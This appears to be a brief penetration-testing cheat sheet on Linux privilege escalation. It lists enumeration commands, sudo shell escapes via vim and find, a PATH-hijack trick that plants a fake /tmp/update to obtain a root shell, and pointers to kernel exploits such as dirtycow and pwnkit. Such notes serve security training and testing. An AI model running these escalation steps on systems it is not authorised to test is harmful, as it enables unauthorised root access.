🐧 Linux Privilege Escalation

Check for misconfigs, exploitable binaries, and writable files to escalate privileges.

➡️ Environment: See 00_environment_setup

🧪 Basic Enum

uname -a
id
whoami
sudo -l

find / -perm -u=s -type f 2>/dev/null       # SUID
find / -writable -type d 2>/dev/null         # Writable dirs

sudo -l
sudo /usr/bin/vim → :!sh
sudo /usr/bin/find → find . -exec /bin/sh \; -quit

cat /etc/crontab
ls -la /etc/cron*
# Check for writable scripts run as root

echo '/bin/bash' > /tmp/update
chmod +x /tmp/update
export PATH=/tmp:$PATH
sudo run-as-root-script

uname -r
searchsploit linux kernel

Use dirtycow, overlayfs, CVE-2021-4034 (pwnkit) if kernel is vulnerable.